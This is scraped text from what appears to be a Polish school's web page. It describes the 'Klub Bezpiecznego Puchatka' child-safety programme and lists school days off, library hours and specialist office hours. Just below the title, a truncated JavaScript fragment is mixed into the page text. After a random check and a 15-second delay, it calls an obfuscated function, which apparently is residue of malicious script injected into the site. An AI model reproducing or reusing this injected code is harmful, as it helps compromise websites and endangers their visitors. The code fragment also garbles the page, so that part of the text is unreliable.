Klub bezpiecznego Puchatka

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}puchatek

W bieżącym roku szkolnym nasza szkoła po raz kolejny przystąpiła do programu edukacyjnego „Klub Bezpiecznego Puchatka.” Program skierowany jest do dzieci rozpoczynających naukę w szkole. Jego celem jest poprawa bezpieczeństwa najmłodszych uczniów na drodze, w szkole, w domu i w czasie zabawy. Program ma również na celu edukację rodziców w zakresie ochrony dzieci przed zagrożeniami.

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30